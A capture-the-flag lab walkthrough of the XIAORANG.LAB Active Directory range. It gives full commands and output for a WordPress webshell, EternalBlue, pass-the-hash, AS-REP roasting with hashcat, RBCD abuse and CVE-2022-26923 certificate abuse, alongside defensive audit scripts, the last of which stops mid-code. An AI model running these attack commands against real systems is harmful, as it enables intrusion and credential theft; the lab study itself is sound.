网鼎杯 2022 Semi-final Reproduction

This post was last updated on 2 May 2025 (early morning).

Start by scanning the target with fscan:

```
D:\ONE-FOX集成工具箱_V8.2公开版_by狐狸\gui_scan\fscan>fscan.exe -h 39.99.229.232
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-04-15 20:44:35] [INFO] 暴力破解线程数: 1
[2025-04-15 20:44:35] [INFO] 开始信息扫描
[2025-04-15 20:44:35] [INFO] 最终有效主机数量: 1
[2025-04-15 20:44:35] [INFO] 开始主机扫描
[2025-04-15 20:44:35] [INFO] 有效端口数量: 233
[2025-04-15 20:44:35] [SUCCESS] 端口开放 39.99.229.232:22
[2025-04-15 20:44:35] [SUCCESS] 端口开放 39.99.229.232:80
[2025-04-15 20:44:35] [SUCCESS] 服务识别 39.99.229.232:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-15 20:44:40] [SUCCESS] 服务识别 39.99.229.232:80 => [http]
[2025-04-15 20:44:45] [INFO] 存活端口数量: 2
[2025-04-15 20:44:45] [INFO] 开始漏洞扫描
[2025-04-15 20:44:45] [INFO] 加载的插件: ssh, webpoc, webtitle
[2025-04-15 20:44:45] [SUCCESS] 网站标题 http://39.99.229.232 状态码:200 长度:39988 标题:XIAORANG.LAB
[2025-04-15 20:45:02] [SUCCESS] 扫描已完成: 3/3
```

Nothing of interest there, so run a directory scan:

```
[20:45:31] Starting: 
[20:45:36] 403 - 278B - /.ht_wsr.txt
[20:45:36] 403 - 278B - /.htaccess.save
[20:45:36] 403 - 278B - /.htaccessBAK
[20:45:36] 403 - 278B - /.htaccess.orig
[20:45:36] 403 - 278B - /.html
[20:45:36] 403 - 278B - /.htaccess_extra
[20:45:36] 403 - 278B - /.htm
[20:45:36] 403 - 278B - /.htaccess.bak1
[20:45:36] 403 - 278B - /.htaccessOLD2
[20:45:36] 403 - 278B - /.htaccessOLD
[20:45:36] 403 - 278B - /.htaccess.sample
[20:45:36] 403 - 278B - /.htaccess_orig
[20:45:36] 403 - 278B - /.htaccess_sc
[20:45:36] 403 - 278B - /.htpasswd_test
[20:45:36] 403 - 278B - /.htpasswds
[20:45:36] 403 - 278B - /.httr-oauth
[20:45:37] 403 - 278B - /.php
[20:45:59] 301 - 0B - /index.php -> http://39.99.229.232/
[20:46:00] 404 - 35KB - /index.php/login/
[20:46:01] 200 - 7KB - /license.txt
[20:46:08] 200 - 3KB - /readme.html
[20:46:09] 403 - 278B - /server-status
[20:46:09] 403 - 278B - /server-status/
[20:46:18] 301 - 317B - /wp-admin -> http://39.99.229.232/wp-admin/
[20:46:18] 200 - 513B - /wp-admin/install.php
[20:46:18] 409 - 3KB - /wp-admin/setup-config.php
[20:46:18] 400 - 1B - /wp-admin/admin-ajax.php
[20:46:18] 302 - 0B - /wp-admin/ -> http://39.99.229.232/wp-login.php?redirect_to=http%3A%2F%2F39.99.229.232%2Fwp-admin%2F&reauth=1
[20:46:18] 200 - 0B - /wp-config.php
[20:46:18] 200 - 0B - /wp-content/
[20:46:18] 301 - 319B - /wp-content -> http://39.99.229.232/wp-content/
[20:46:18] 200 - 477B - /wp-content/uploads/
[20:46:18] 200 - 416B - /wp-content/upgrade/
[20:46:18] 200 - 84B - /wp-content/plugins/akismet/akismet.php
[20:46:18] 500 - 0B - /wp-content/plugins/hello.php
[20:46:18] 200 - 0B - /wp-includes/rss-functions.php
[20:46:18] 301 - 320B - /wp-includes -> http://39.99.229.232/wp-includes/
[20:46:18] 200 - 2KB - /wp-login.php
[20:46:18] 200 - 0B - /wp-cron.php
[20:46:18] 200 - 5KB - /wp-includes/
[20:46:18] 302 - 0B - /wp-signup.php -> http://39.99.229.232/wp-login.php?action=register
[20:46:18] 405 - 42B - /xmlrpc.php
```

It is clearly a WordPress site.

flag1

A quick manual test showed a weak password; brute-forcing it with a fuzzer would also work.

Log in with admin:123456, then write the webshell through the theme editor.


Connect to the webshell with 蚁剑 (AntSword):

```
http://39.99.159.217//wp-content/themes/twentytwentyone/header.php
```


First upload fscan and scan the internal network:


```
[2025-04-15 21:02:45] [SUCCESS] 目标 172.22.15.35    存活 (ICMP)
[2025-04-15 21:02:45] [SUCCESS] 目标 172.22.15.26 存活 (ICMP)
[2025-04-15 21:02:46] [SUCCESS] 目标 172.22.15.13 存活 (ICMP)
[2025-04-15 21:02:46] [SUCCESS] 目标 172.22.15.18 存活 (ICMP)
[2025-04-15 21:02:46] [SUCCESS] 目标 172.22.15.24 存活 (ICMP)
[2025-04-15 21:02:51] [INFO] 存活主机数量: 5
[2025-04-15 21:02:51] [INFO] 有效端口数量: 233
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.26:80
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.26:22
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.18:80
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.24:80
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.13:88
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.24:135
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.13:135
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.35:135
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.18:139
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.13:139
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.35:139
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.18:135
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.24:139
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.13:389
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.18:445
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.35:445
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.13:445
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.24:445
[2025-04-15 21:02:52] [SUCCESS] 服务识别 172.22.15.26:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.26:80 => [http]
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.13:88 =>
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.18:80 => [http]
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.18:139 => Banner:[.]
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.24:80 => [http]
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.13:139 => Banner:[.]
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.35:139 => Banner:[.]
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.24:139 => Banner:[.]
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.13:389 => [ldap] 产品:Microsoft Windows Active Directory LDAP 系统:Windows 信息:Domain: xiaorang.lab, Site: Default-First-Site-Name
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.18:445 =>
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.35:445 =>
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.13:445 =>
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.24:445 =>
[2025-04-15 21:02:58] [SUCCESS] 端口开放 172.22.15.24:3306
[2025-04-15 21:03:02] [SUCCESS] 服务识别 172.22.15.24:3306 => [mysql] 版本:5.7.26 产品:MySQL Banner:[J.5.7.26.b.H.32...v 2A` 5\@r mysql_native_password]
[2025-04-15 21:03:57] [SUCCESS] 服务识别 172.22.15.24:135 =>
[2025-04-15 21:03:57] [SUCCESS] 服务识别 172.22.15.13:135 =>
[2025-04-15 21:03:57] [SUCCESS] 服务识别 172.22.15.35:135 =>
[2025-04-15 21:03:57] [SUCCESS] 服务识别 172.22.15.18:135 =>
[2025-04-15 21:03:57] [INFO] 存活端口数量: 19
[2025-04-15 21:03:57] [INFO] 开始漏洞扫描
[2025-04-15 21:03:57] [INFO] 加载的插件: findnet, ldap, ms17010, mysql, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-04-15 21:03:57] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.15.18
主机名: XR-CA
发现的网络接口:
IPv4地址:
└─ 172.22.15.18
[2025-04-15 21:03:57] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.15.13
主机名: XR-DC01
发现的网络接口:
IPv4地址:
└─ 172.22.15.13
[2025-04-15 21:03:57] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.15.24
主机名: XR-WIN08
发现的网络接口:
IPv4地址:
└─ 172.22.15.24
[2025-04-15 21:03:57] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.15.35
主机名: XR-0687
发现的网络接口:
IPv4地址:
└─ 172.22.15.35
[2025-04-15 21:03:57] [INFO] 系统信息 172.22.15.13 [Windows Server 2016 Standard 14393]
[2025-04-15 21:03:57] [SUCCESS] 发现漏洞 172.22.15.24 [Windows Server 2008 R2 Enterprise 7601 Service Pack 1] MS17-010
[2025-04-15 21:03:57] [SUCCESS] 网站标题 http://172.22.15.24 状态码:302 长度:0 标题:无标题 重定向地址: http://172.22.15.24/www
[2025-04-15 21:03:57] [SUCCESS] 网站标题 http://172.22.15.18 状态码:200 长度:703 标题:IIS Windows Server
[2025-04-15 21:03:57] [SUCCESS] NetBios 172.22.15.18 XR-CA.xiaorang.lab Windows Server 2016 Standard 14393
[2025-04-15 21:03:57] [SUCCESS] NetBios 172.22.15.35 XIAORANG\XR-0687
[2025-04-15 21:03:57] [SUCCESS] NetBios 172.22.15.24 WORKGROUP\XR-WIN08 Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[2025-04-15 21:03:57] [SUCCESS] NetBios 172.22.15.13 DC:XR-DC01.xiaorang.lab Windows Server 2016 Standard 14393
[2025-04-15 21:03:57] [SUCCESS] 网站标题 http://172.22.15.26 状态码:200 长度:39962 标题:XIAORANG.LAB
[2025-04-15 21:03:58] [SUCCESS] 目标: http://172.22.15.18:80
漏洞类型: poc-yaml-active-directory-certsrv-detect
漏洞名称:
详细信息:
author:AgeloVito
links:https://www.cnblogs.com/EasonJim/p/6859345.html
[2025-04-15 21:03:58] [SUCCESS] 网站标题 http://172.22.15.24/www/sys/index.php 状态码:200 长度:135 标题:无标题
[2025-04-15 21:04:22] [SUCCESS] 扫描已完成: 35/35
```

Summarising the findings:

```
172.22.15.26  current host (already compromised)
172.22.15.13  XR-DC01
172.22.15.18  XR-CA
172.22.15.24  XR-WIN08  MS17-010
172.22.15.35  XR-0687
```

```
[2025-04-15 21:03:57] [SUCCESS] 发现漏洞 172.22.15.24 [Windows Server 2008 R2 Enterprise 7601 Service Pack 1] MS17-010
```

A tunnel into the internal network is needed (this is where I was stuck for quite a while); here an old version of frp is used to bring it up directly.

flag2

Exploit EternalBlue (MS17-010):

```
proxychains4 msfconsole
search MS17-010 blue
use 0
# or directly:
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.15.24
run
```

```
meterpreter > hashdump
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e52d03e9b939997401466a0ec5a9cbc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
```

msf was awkward to use here, probably because it is not the Pro version; using psexec directly works instead. In practice, line 644 of psexec.py needed a small tweak.

```bash
proxychains4 python3 psexec.py administrator@172.22.15.24 -hashes ':0e52d03e9b939997401466a0ec5a9cbc' -codec gbk
```


flag3

Access the web page through the browser proxy; it is again the weak password admin:123456.


Export the data.


Export the template, then tidy up the list of domain usernames:

```
lixiuying@xiaorang.lab
lixiaoliang@xiaorang.lab
zhangyi@xiaorang.lab
jiaxiaoliang@xiaorang.lab
zhangli@xiaorang.lab
zhangwei@xiaorang.lab
liuqiang@xiaorang.lab
wangfang@xiaorang.lab
wangwei@xiaorang.lab
wanglihong@xiaorang.lab
huachunmei@xiaorang.lab
wanghao@xiaorang.lab
zhangxinyu@xiaorang.lab
huzhigang@xiaorang.lab
lihongxia@xiaorang.lab
wangyulan@xiaorang.lab
chenjianhua@xiaorang.lab
```

Looking into it, this is AS-REP Roasting:

```
proxychains4 impacket-GetNPUsers -dc-ip 172.22.15.13 -usersfile username.txt xiaorang.lab/ 

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:40fc9781df5b246f5b3cd4e8b6110d79$910cc853cbcc73e71332fa64924a9a5901f5af16726c2b1fab1984bcf6f7214fd9ba4fa2cfe23e11bc4951f5996839ad080d0405ee1e6d903a90b5548616659c86969a99da96a7b4f1a617e9c85257a8836fbc0e83a6771c51172af7e395b5adcec1d15be4aab915a37fa1f160c6b1e973a11de041cd223753b8f4630ffad44c961562fcfcc65e35ae108425a3668eb48498feb61ac62edf82e10f4df3e9ce0b7e606d8d001fb4c3cdd66701aa577eb6b2f09ef691af8181c9ca16d5d4c1ec3a286c79ee28a845b1640fd52428511d8247eb9da96b03ae287405eb7d2508c8cc357463bb1eb70fb8714e3807
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:32d6ed87b8e874e386a028e86f3a3384$cc7e7580cfa37c6aac86218fc4d7a07632872b25e008b94c859702f99fb79852b4590a9cefa7aefb93065fd9f3f9b0ffee6fc41a1cbd4bde02e97d3d4fc0a8f806a8959a1f13763e964c0ec19a33f3c47e7656411db163fb3a7c5ffab6e291cbd05c6403335c84370005da10ac29ca5038dbef19f3884c3017978fabe2b83ddf36438b306c71ff1908a58efc6bd827538c32521ade17adae3ad3e114cfe726368e8854576e010cc493899d426e1e842a72db5f7608350674874c3b7990802c9abb5055e785635b6c41ea946f43b0de3724d4b977ac28aee8502e7c6a80e3e9b9ed28a68db218cf81835f7398
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] User lihongxia@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] User wangyulan@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] User chenjianhua@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
```

Two results come out of this, the two AS-REP hashes (the writeup calls them TGTs):

```
$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:40fc9781df5b246f5b3cd4e8b6110d79$910cc853cbcc73e71332fa64924a9a5901f5af16726c2b1fab1984bcf6f7214fd9ba4fa2cfe23e11bc4951f5996839ad080d0405ee1e6d903a90b5548616659c86969a99da96a7b4f1a617e9c85257a8836fbc0e83a6771c51172af7e395b5adcec1d15be4aab915a37fa1f160c6b1e973a11de041cd223753b8f4630ffad44c961562fcfcc65e35ae108425a3668eb48498feb61ac62edf82e10f4df3e9ce0b7e606d8d001fb4c3cdd66701aa577eb6b2f09ef691af8181c9ca16d5d4c1ec3a286c79ee28a845b1640fd52428511d8247eb9da96b03ae287405eb7d2508c8cc357463bb1eb70fb8714e3807
$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:32d6ed87b8e874e386a028e86f3a3384$cc7e7580cfa37c6aac86218fc4d7a07632872b25e008b94c859702f99fb79852b4590a9cefa7aefb93065fd9f3f9b0ffee6fc41a1cbd4bde02e97d3d4fc0a8f806a8959a1f13763e964c0ec19a33f3c47e7656411db163fb3a7c5ffab6e291cbd05c6403335c84370005da10ac29ca5038dbef19f3884c3017978fabe2b83ddf36438b306c71ff1908a58efc6bd827538c32521ade17adae3ad3e114cfe726368e8854576e010cc493899d426e1e842a72db5f7608350674874c3b7990802c9abb5055e785635b6c41ea946f43b0de3724d4b977ac28aee8502e7c6a80e3e9b9ed28a68db218cf81835f7398
```

Crack them with hashcat:

```bash
hashcat -m 18200 --force '$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:40fc9781df5b246f5b3cd4e8b6110d79$910cc853cbcc73e71332fa64924a9a5901f5af16726c2b1fab1984bcf6f7214fd9ba4fa2cfe23e11bc4951f5996839ad080d0405ee1e6d903a90b5548616659c86969a99da96a7b4f1a617e9c85257a8836fbc0e83a6771c51172af7e395b5adcec1d15be4aab915a37fa1f160c6b1e973a11de041cd223753b8f4630ffad44c961562fcfcc65e35ae108425a3668eb48498feb61ac62edf82e10f4df3e9ce0b7e606d8d001fb4c3cdd66701aa577eb6b2f09ef691af8181c9ca16d5d4c1ec3a286c79ee28a845b1640fd52428511d8247eb9da96b03ae287405eb7d2508c8cc357463bb1eb70fb8714e3807' /usr/share/wordlists/rockyou.txt

hashcat -m 18200 --force '$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:32d6ed87b8e874e386a028e86f3a3384$cc7e7580cfa37c6aac86218fc4d7a07632872b25e008b94c859702f99fb79852b4590a9cefa7aefb93065fd9f3f9b0ffee6fc41a1cbd4bde02e97d3d4fc0a8f806a8959a1f13763e964c0ec19a33f3c47e7656411db163fb3a7c5ffab6e291cbd05c6403335c84370005da10ac29ca5038dbef19f3884c3017978fabe2b83ddf36438b306c71ff1908a58efc6bd827538c32521ade17adae3ad3e114cfe726368e8854576e010cc493899d426e1e842a72db5f7608350674874c3b7990802c9abb5055e785635b6c41ea946f43b0de3724d4b977ac28aee8502e7c6a80e3e9b9ed28a68db218cf81835f7398' /usr/share/wordlists/rockyou.txt
```

Both hashes crack, giving two sets of credentials.
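As an added example (not part of the original writeup), the audit a defender would run for the condition that made this step work: the two accounts were roastable because their userAccountControl has the DONT_REQ_PREAUTH bit set, and the resulting $krb5asrep$23$ hashes were cheap to crack because RC4 (etype 23) was still usable for them. The SAMPLE_USERS records are constructed, not real directory data.

```python
# Added example, not the writeup's code: flag accounts exposed to AS-REP roasting
# from an LDAP export of userAccountControl and msDS-SupportedEncryptionTypes.
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000   # DONT_REQ_PREAUTH: KDC answers AS-REQ without pre-auth
RC4_HMAC = 0x4                       # bit in msDS-SupportedEncryptionTypes (Kerberos etype 23)

# Constructed sample records (attribute names as returned by LDAP; values made up).
SAMPLE_USERS = [
    {"sAMAccountName": "lixiuying", "userAccountControl": 0x400200,
     "msDS-SupportedEncryptionTypes": None},      # attribute unset: RC4 still selectable
    {"sAMAccountName": "huachunmei", "userAccountControl": 0x400200,
     "msDS-SupportedEncryptionTypes": 0x18},      # AES128 | AES256 only
    {"sAMAccountName": "lihongxia", "userAccountControl": 0x200,
     "msDS-SupportedEncryptionTypes": None},      # pre-auth required: not roastable
    {"sAMAccountName": "olduser", "userAccountControl": 0x400202,
     "msDS-SupportedEncryptionTypes": None},      # bit set, but the account is disabled
]

def asrep_exposure(users):
    """Enabled accounts that skip pre-auth, and whether an RC4 (hashcat mode 18200) hash is obtainable."""
    findings = []
    for u in users:
        uac = int(u["userAccountControl"])
        if not (uac & UF_DONT_REQUIRE_PREAUTH) or (uac & UF_ACCOUNTDISABLE):
            continue
        enc = u.get("msDS-SupportedEncryptionTypes")
        # Unset means RC4 is still among the account's usable etypes, so a client can ask
        # for an RC4 reply. AES-only accounts still answer, but not in the fast etype-23 form.
        rc4_possible = enc is None or bool(int(enc) & RC4_HMAC)
        findings.append({"user": u["sAMAccountName"], "rc4_possible": rc4_possible})
    return findings

def remediated_uac(uac):
    """userAccountControl value to write back so the account requires pre-authentication again."""
    return int(uac) & ~UF_DONT_REQUIRE_PREAUTH

if __name__ == "__main__":
    for f in asrep_exposure(SAMPLE_USERS):
        print("%-12s pre-auth disabled, RC4 hash obtainable: %s" % (f["user"], f["rc4_possible"]))
```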

Run BloodHound collection:

```bash
proxychains4 bloodhound-python -u lixiuying -p winniethepooh -d xiaorang.lab -c all -ns 172.22.15.13 --zip --dns-tcp
```

Import the data into BloodHound: lixiuying has GenericWrite over XR-0687, so RBCD (resource-based constrained delegation) can be abused:

```bash
proxychains4 impacket-addcomputer xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name 'HACK$' -computer-pass 'orange@admin'

proxychains4 impacket-rbcd xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'HACK$'

proxychains4 impacket-getST xiaorang.lab/'HACK$':'orange@admin' -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13

export KRB5CCNAME=Administrator@cifs_XR-0687.xiaorang.lab@XIAORANG.LAB.ccache

proxychains4 impacket-psexec administrator@XR-0687.xiaorang.lab -k -no-pass -dc-ip 172.22.15.13
```


flag4

Next is ADCS; the vulnerability being tested here is CVE-2022-26923.

Request a certificate from the template:

```bash
proxychains4 certipy-ad account create -u lixiuying@xiaorang.lab -p winniethepooh -dc-ip 172.22.15.13 -user Test2 -pass Test1234 -dns 'XR-DC01.xiaorang.lab'
proxychains4 certipy-ad req -u Test2\$@xiaorang.lab -p Test1234 -target 172.22.15.18 -ca "xiaorang-XR-CA-CA" -template Machine
```
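An added example (not from the writeup) of the defender-side check for the CVE-2022-26923 condition used above: a low-privileged user creates a computer account whose dNSHostName is set to the DC's name, and the Machine template then issues a certificate for XR-DC01. Auditing computer objects for a dNSHostName that does not match the account's own name, for two accounts claiming the same host name, and for accounts created by ordinary users (mS-DS-CreatorSID populated) surfaces exactly that. SAMPLE_COMPUTERS and the SID inside it are constructed values.

```python
# Added example, not the writeup's code: audit AD computer objects for the
# dNSHostName manipulation behind CVE-2022-26923.
from collections import defaultdict

DOMAIN = "xiaorang.lab"   # domain from the writeup

# Constructed sample of computer objects (values as an LDAP query would return them).
# mS-DS-CreatorSID is only set when a non-admin created the account via ms-DS-MachineAccountQuota.
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "XR-DC01$", "dNSHostName": "XR-DC01.xiaorang.lab", "mS-DS-CreatorSID": None},
    {"sAMAccountName": "XR-0687$", "dNSHostName": "XR-0687.xiaorang.lab", "mS-DS-CreatorSID": None},
    {"sAMAccountName": "Test2$", "dNSHostName": "XR-DC01.xiaorang.lab",
     "mS-DS-CreatorSID": "S-1-5-21-DOMAINSID-1105"},   # placeholder SID of the creating user
    {"sAMAccountName": "HACK$", "dNSHostName": None,
     "mS-DS-CreatorSID": "S-1-5-21-DOMAINSID-1105"},
]

def expected_dns_hostname(sam_account_name):
    """A domain-joined computer's dNSHostName is normally <account name without $>.<domain>."""
    return sam_account_name.rstrip("$").lower() + "." + DOMAIN

def audit_computers(computers):
    """Return (account, reason) findings; one account may appear more than once."""
    findings, by_host = [], defaultdict(list)
    for c in computers:
        sam = c["sAMAccountName"]
        dns = (c.get("dNSHostName") or "").lower()
        if dns:
            by_host[dns].append(sam)
            if dns != expected_dns_hostname(sam):
                findings.append((sam, "dNSHostName %s does not match account name" % c["dNSHostName"]))
        if c.get("mS-DS-CreatorSID"):
            findings.append((sam, "created by user %s via MachineAccountQuota" % c["mS-DS-CreatorSID"]))
    # Two objects claiming one host name is the strongest signal: the DC name is being impersonated.
    for host, accounts in by_host.items():
        if len(accounts) > 1:
            findings.append((",".join(accounts), "dNSHostName %s claimed by several accounts" % host))
    return findings

if __name__ == "__main__":
    for account, reason in audit_computers(SAMPLE_COMPUTERS):
        print(account, ":", reason)
```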

The PassTheCert Python script (AlmondOffSec/PassTheCert on GitHub, Python directory) is needed for the following step.

Use the pfx certificate generated above to configure RBCD on the domain controller for the HACK$ account created earlier:

```bash
certipy-ad cert -pfx xr-dc01.pfx -nokey -out user.crt
certipy-ad cert -pfx xr-dc01.pfx -nocert -out user.key

proxychains4 python passthecert.py -action whoami -crt user.crt -key user.key -domain xiaorang.lab -dc-ip 172.22.15.13
proxychains4 python passthecert.py -action write_rbcd -crt user.crt -key user.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to 'XR-DC01$' -delegate-from 'HACK$'
```
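As an added example (not code from the writeup or from impacket), the check a defender can run against the attribute both RBCD steps write, the earlier one on XR-0687$ with impacket-rbcd and this one on XR-DC01$ with passthecert: decode msDS-AllowedToActOnBehalfOfOtherIdentity and compare the SIDs it grants against an approved list. build_rbcd_descriptor only constructs a sample in the same layout so the parser can be exercised offline; ROGUE_SID is a made-up value.

```python
# Added example, not the writeup's code: decode msDS-AllowedToActOnBehalfOfOtherIdentity.
# The rbcd tools store a self-relative security descriptor there whose DACL lists the
# SIDs allowed to delegate to the computer (HACK$ in the writeup).
import struct

FULL_CONTROL = 0x000F01FF            # access mask the rbcd tools write into each ACE
ADMINISTRATORS = "S-1-5-32-544"      # owner/group the tools set on the descriptor

def sid_to_bytes(sid):
    """String SID -> binary SID (revision, sub-authority count, 48-bit authority, sub-authorities)."""
    parts = [int(p) for p in sid.split("-")[1:]]
    rev, auth, subs = parts[0], parts[1], parts[2:]
    return bytes([rev, len(subs)]) + auth.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)

def bytes_to_sid(buf, off):
    """Binary SID at buf[off:] -> string SID."""
    rev, count = buf[off], buf[off + 1]
    auth = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (rev, auth, "-".join(str(s) for s in subs))

def build_rbcd_descriptor(sids):
    """Constructed sample in the layout the rbcd tools write: one ACCESS_ALLOWED ACE per SID."""
    aces = b""
    for sid in sids:
        body = struct.pack("<I", FULL_CONTROL) + sid_to_bytes(sid)
        aces += struct.pack("<BBH", 0x00, 0x00, 4 + len(body)) + body      # AceType, AceFlags, AceSize
    acl = struct.pack("<BBHHH", 0x04, 0, 8 + len(aces), len(sids), 0) + aces  # ACL_REVISION_DS header
    owner = sid_to_bytes(ADMINISTRATORS)
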